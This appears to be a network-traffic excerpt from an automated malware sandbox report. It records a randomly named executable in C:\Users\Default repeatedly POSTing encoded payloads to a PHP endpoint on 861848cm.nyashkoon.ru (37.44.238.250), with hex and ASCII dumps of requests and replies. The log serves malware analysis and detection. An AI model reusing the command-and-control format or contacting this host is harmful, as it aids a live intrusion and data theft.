                                                                                            Data Ascii: SR_[VVPXZ_RQTR[[UQYVQ_RYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/.+^+<X>5X=-!$;4Z4%<>\:C X7.]&9'X$.Q-
                                                                                            Nov 5, 2024 23:52:54.545664072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:54.623833895 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            25 | 192.168.2.4 | 49766 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:54.747970104 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:55.102586985 CET | 1024 | OUT | Data Raw: 56 57 5a 58 56 58 55 5a 5a 5f 52 51 54 5f 5b 59 55 56 59 59 51 51 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZXVXUZZ_RQT_[YUVYYQQR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;?>V=8+?3X>>*$+#",2U(4,&'7>&'X$.Q-2
                                                                                            Nov 5, 2024 23:52:55.561048031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:55.638500929 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            26 | 192.168.2.4 | 49768 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:55.765150070 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:56.118107080 CET | 1024 | OUT | Data Raw: 56 53 5a 55 53 58 50 5b 5a 5f 52 51 54 52 5b 5b 55 57 59 5c 51 50 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZUSXP[Z_RQTR[[UWY\QPR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%],=($?#')_=_'$#P(>/Y,5(!4%29'X$.Q-
                                                                                            Nov 5, 2024 23:52:56.591636896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:56.667316914 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            27 | 192.168.2.4 | 49769 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:56.811791897 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:57.164937019 CET | 1284 | OUT | Data Raw: 56 50 5a 5d 53 5a 55 5a 5a 5f 52 51 54 52 5b 5c 55 50 59 57 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZ]SZUZZ_RQTR[\UPYWQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]-/R?+(]? $>\5>-53# <!(=7],%/#7"29'X$.Q-
                                                                                            Nov 5, 2024 23:52:57.615921974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:57.686734915 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 59 28 29 32 5f 24 2b 0a 53 29 3e 29 5b 3f 30 23 5b 2d 21 28 11 2a 1d 24 1e 2a 5e 3c 55 23 3c 23 5e 21 54 2d 5a 21 22 28 03 3f 11 21 5f 05 1d 3a 07 27 17 0d 08 29 21 36 1b 3e 37 01 1e 25 56 27 19 3e 15 31 04 37 04 0c 55 25 58 26 01 26 1c 20 0b 2b 27 2a 05 39 3f 38 0d 27 2a 2a 57 09 16 20 56 30 23 30 00 3e 0f 3c 07 27 2d 3e 03 31 03 23 52 2a 3f 2f 1f 37 42 3d 01 3d 0d 23 5f 36 27 0f 04 26 39 25 19 32 07 2c 0a 3c 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: Y()2_$+S)>)[?0#[-!(*$*^<U#<#^!T-Z!"(?!_:')!6>7%V'>17U%X&& +'*9?8'**W V0#0><'->1#R*?/7B==#_6'&9%2,<&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            28 | 192.168.2.4 | 49770 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:56.816936970 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:57.164895058 CET | 1016 | OUT | Data Raw: 53 55 5a 5d 53 58 55 59 5a 5f 52 51 54 5a 5b 53 55 53 59 59 51 56 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ]SXUYZ_RQTZ[SUSYYQVR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;>?^8^<4Y(*%==&0;< 2V?#:&;4!%9'X$.Q-
                                                                                            Nov 5, 2024 23:52:57.636512041 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            29 | 192.168.2.4 | 49772 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:57.811280966 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:58.164865971 CET | 1024 | OUT | Data Raw: 56 53 5a 54 56 5e 55 5a 5a 5f 52 51 54 52 5b 59 55 52 59 56 51 56 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZTV^UZZ_RQTR[YURYVQVRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-?W<(3<7=9">-&%(8Y4<=<\.'47!&9'X$.Q-
                                                                                            Nov 5, 2024 23:52:58.633621931 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:58.710669994 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            30 | 192.168.2.4 | 49773 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:58.879673958 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:59.227482080 CET | 1024 | OUT | Data Raw: 56 5e 5a 55 56 5a 50 5c 5a 5f 52 51 54 53 5b 52 55 5c 59 5c 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^ZUVZP\Z_RQTS[RU\Y\QQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%];"((_(<X))_>_'( *V(.0Y!7>19'X$.Q-
                                                                                            Nov 5, 2024 23:52:59.698623896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:59.766890049 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            31 | 192.168.2.4 | 49779 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:59.916762114 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:00.274300098 CET | 1016 | OUT | Data Raw: 56 51 5a 58 56 5b 50 59 5a 5f 52 51 54 5a 5b 5f 55 5d 59 5e 51 56 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZXV[PYZ_RQTZ[_U]Y^QVR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?.S<^;>0'*2>.*'[4?+3-&8#$-&)'X$.Q-2
                                                                                            Nov 5, 2024 23:53:00.728030920 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:00.807709932 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            32 | 192.168.2.4 | 49784 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:00.947052002 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:01.305496931 CET | 1024 | OUT | Data Raw: 56 53 5a 5a 56 5c 55 58 5a 5f 52 51 54 5c 5b 59 55 51 59 56 51 50 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZV\UXZ_RQT\[YUQYVQPR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,/&V(+<<04=:=[=087"?V(.4-/#Q"X2'X$.Q->
                                                                                            Nov 5, 2024 23:53:01.759044886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:01.831165075 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            33 | 192.168.2.4 | 49789 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:02.175106049 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:02.524265051 CET | 1024 | OUT | Data Raw: 53 55 5a 5e 56 5a 50 5d 5a 5f 52 51 54 59 5b 5f 55 54 59 5a 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ^VZP]Z_RQTY[_UTYZQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_/<-?(<#7)*=[*_3^4^ "V+=+-<#'.19'X$.Q-*


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            34 | 192.168.2.4 | 49792 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:02.702539921 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:03.055535078 CET | 1264 | OUT | Data Raw: 53 52 5a 5f 56 56 55 5f 5a 5f 52 51 54 52 5b 5b 55 56 59 5f 51 53 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZ_VVU_Z_RQTR[[UVY_QSRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;%<^ \+3<[)9>>-^'[7<= .%<]#7>2'X$.Q-
                                                                                            Nov 5, 2024 23:53:03.523082018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:03.594216108 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 00 3c 3a 2e 58 33 2b 05 0b 29 10 29 58 28 09 3f 5e 3b 54 28 12 2a 23 02 11 3d 06 33 08 20 59 30 00 23 22 03 10 37 32 2c 02 3c 3b 21 5f 05 1d 39 5f 24 29 24 1f 3e 31 3a 16 28 27 0e 42 31 09 3b 1c 2a 3b 00 59 23 14 36 54 25 2e 25 12 26 32 27 51 2b 42 35 17 39 3c 2f 55 25 2a 2a 57 09 16 23 08 33 33 01 5e 29 31 2f 10 24 2e 3e 03 31 04 33 57 3e 02 2f 58 23 37 25 07 2a 33 05 58 36 34 3e 5a 24 2a 2a 40 31 2e 28 08 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #<:.X3+))X(?^;T(*#=3 Y0#"72,<;!_9_$)$>1:('B1;*;Y#6T%.%&2'Q+B59</U%**W#33^)1/$.>13W>/X#7%*3X64>Z$**@1.()"&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            35 | 192.168.2.4 | 49793 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:02.836927891 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:03.196155071 CET | 1024 | OUT | Data Raw: 53 53 5f 59 56 57 50 5f 5a 5f 52 51 54 53 5b 5b 55 52 59 5c 51 50 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SS_YVWP_Z_RQTS[[URY\QPR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;?8<3(])%[=3#?*W<Y.%(Y#&]&'X$.Q-
                                                                                            Nov 5, 2024 23:53:03.664726019 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:03.744987011 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            36 | 192.168.2.4 | 49799 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:03.872970104 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:04.227560043 CET | 1024 | OUT | Data Raw: 56 57 5f 59 56 58 55 59 5a 5f 52 51 54 5f 5b 5e 55 57 59 58 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_YVXUYZ_RQT_[^UWYXQQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/?+34Y)?>"Z08 7/>V?>Z-,_!72%'X$.Q-2
                                                                                            Nov 5, 2024 23:53:04.682724953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:04.758843899 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            37 | 192.168.2.4 | 49805 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:04.892666101 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
